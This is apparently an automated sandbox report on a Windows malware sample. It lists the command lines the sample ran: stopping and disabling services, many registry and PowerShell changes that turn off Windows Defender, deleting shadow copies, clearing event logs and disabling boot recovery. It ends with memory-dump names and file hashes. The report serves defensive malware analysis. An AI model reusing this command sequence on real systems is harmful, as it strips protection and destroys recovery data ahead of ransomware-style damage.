C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe

"C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe"

C:\Windows\system32\net.exe

net.exe stop "NetMsmqActivator" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "NetMsmqActivator" /y

C:\Windows\system32\net.exe

net.exe stop "SamSs" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SamSs" /y

C:\Windows\system32\net.exe

net.exe stop "SDRSVC" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SDRSVC" /y

C:\Windows\system32\net.exe

net.exe stop "SstpSvc" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SstpSvc" /y

C:\Windows\system32\net.exe

net.exe stop "UI0Detect" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "UI0Detect" /y

C:\Windows\system32\net.exe

net.exe stop "VSS" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "VSS" /y

C:\Windows\system32\net.exe

net.exe stop "wbengine" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "wbengine" /y

C:\Windows\system32\net.exe

net.exe stop "WebClient" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "WebClient" /y

C:\Windows\system32\sc.exe

sc.exe config "NetMsmqActivator" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "SamSs" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "SDRSVC" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "SstpSvc" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "UI0Detect" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "VSS" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "wbengine" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "WebClient" start= disabled

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\system32\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl system

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl security

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl application

C:\Windows\System32\Wbem\wmic.exe

wmic.exe SHADOWCOPY /nointeractive

C:\Windows\System32\Wbem\wmic.exe

wmic.exe shadowcopy delete

C:\Windows\system32\bcdedit.exe

bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\bcdedit.exe

bcdedit.exe /set {default} recoveryenabled no

C:\Windows\system32\cmd.exe

cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Program Files\Windows Defender\MpCmdRun.exe

"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Windows\system32\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\system32\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableRealtimeMonitoring $true

Network

N/A

Files

memory/1984-54-0x0000000000000000-mapping.dmp

memory/524-55-0x0000000000000000-mapping.dmp

memory/472-56-0x0000000000000000-mapping.dmp

memory/1416-57-0x0000000000000000-mapping.dmp

memory/1464-58-0x0000000000000000-mapping.dmp

memory/1396-59-0x0000000000000000-mapping.dmp

memory/540-60-0x0000000000000000-mapping.dmp

memory/1752-61-0x0000000000000000-mapping.dmp

memory/1508-62-0x0000000000000000-mapping.dmp

memory/620-63-0x0000000000000000-mapping.dmp

memory/2028-64-0x0000000000000000-mapping.dmp

memory/2044-65-0x0000000000000000-mapping.dmp

memory/1048-66-0x0000000000000000-mapping.dmp

memory/1968-67-0x0000000000000000-mapping.dmp

memory/1084-68-0x0000000000000000-mapping.dmp

memory/736-69-0x0000000000000000-mapping.dmp

memory/964-70-0x0000000000000000-mapping.dmp

memory/1196-71-0x0000000000000000-mapping.dmp

memory/1900-72-0x0000000000000000-mapping.dmp

memory/1712-73-0x0000000000000000-mapping.dmp

memory/1020-74-0x0000000000000000-mapping.dmp

memory/1924-75-0x0000000000000000-mapping.dmp

memory/1704-76-0x0000000000000000-mapping.dmp

memory/1600-77-0x0000000000000000-mapping.dmp

memory/376-78-0x0000000000000000-mapping.dmp

memory/108-79-0x0000000000000000-mapping.dmp

memory/516-80-0x0000000000000000-mapping.dmp

memory/1632-81-0x0000000000000000-mapping.dmp

memory/1764-82-0x0000000000000000-mapping.dmp

memory/620-83-0x0000000000000000-mapping.dmp

memory/2032-84-0x0000000000000000-mapping.dmp

memory/1852-85-0x0000000000000000-mapping.dmp

memory/1120-86-0x0000000000000000-mapping.dmp

memory/1548-87-0x0000000000000000-mapping.dmp

memory/2012-88-0x0000000000000000-mapping.dmp

memory/1736-89-0x0000000000000000-mapping.dmp

memory/556-90-0x0000000000000000-mapping.dmp

memory/888-91-0x0000000000000000-mapping.dmp

memory/1976-92-0x0000000000000000-mapping.dmp

memory/1684-93-0x0000000000000000-mapping.dmp

memory/792-94-0x0000000000000000-mapping.dmp

memory/1404-95-0x0000000000000000-mapping.dmp

memory/1992-96-0x0000000000000000-mapping.dmp

memory/1052-97-0x0000000000000000-mapping.dmp

memory/1624-98-0x0000000000000000-mapping.dmp

memory/1176-99-0x0000000000000000-mapping.dmp

memory/1688-100-0x0000000000000000-mapping.dmp

memory/1188-101-0x0000000000000000-mapping.dmp

memory/1660-102-0x0000000000000000-mapping.dmp

memory/968-103-0x0000000000000000-mapping.dmp

memory/1416-104-0x0000000000000000-mapping.dmp

memory/1104-105-0x0000000000000000-mapping.dmp

memory/436-106-0x0000000000000000-mapping.dmp

memory/1540-107-0x0000000000000000-mapping.dmp

memory/676-108-0x0000000000000000-mapping.dmp

memory/1748-109-0x0000000000000000-mapping.dmp

memory/1696-110-0x0000000000000000-mapping.dmp

memory/816-111-0x0000000000000000-mapping.dmp

memory/2000-112-0x0000000000000000-mapping.dmp

memory/2000-113-0x000007FEFC151000-0x000007FEFC153000-memory.dmp

memory/1948-114-0x0000000000000000-mapping.dmp

memory/524-116-0x0000000000000000-mapping.dmp

memory/832-118-0x0000000000000000-mapping.dmp

memory/1616-119-0x0000000000000000-mapping.dmp

memory/2060-120-0x0000000000000000-mapping.dmp

memory/2156-122-0x000007FEF3360000-0x000007FEF3EBD000-memory.dmp

memory/2156-124-0x00000000025F2000-0x00000000025F4000-memory.dmp

memory/2156-123-0x00000000025F0000-0x00000000025F2000-memory.dmp

memory/2156-125-0x00000000025F4000-0x00000000025F7000-memory.dmp

memory/2156-126-0x000000001B720000-0x000000001BA1F000-memory.dmp

memory/2156-127-0x00000000025FB000-0x000000000261A000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 8fef5645ac7250580d23b10c8a777ffc
SHA1 cd3aa2da88aa658ba0c48e707c89f242bcec5043
SHA256 fd0c3e62f5e616e4f1b62faada33ff626e3f7f646e814a4b1675abb1068585f1
SHA512 3de2c2c044bd529872deac4052ec4d5fa4d3f108cb9250c94a4b1e32f03730ff3d8eca426f6be6c5582d4b63ca428c3e002247af61039248709c615aaf4a2c8e

memory/2248-130-0x000007FEF29C0000-0x000007FEF351D000-memory.dmp

memory/2248-131-0x000000001B8C0000-0x000000001BBBF000-memory.dmp

memory/2248-135-0x0000000002204000-0x0000000002207000-memory.dmp

memory/2248-134-0x0000000002202000-0x0000000002204000-memory.dmp

memory/2248-133-0x000000000220B000-0x000000000222A000-memory.dmp

memory/2248-132-0x0000000002200000-0x0000000002202000-memory.dmp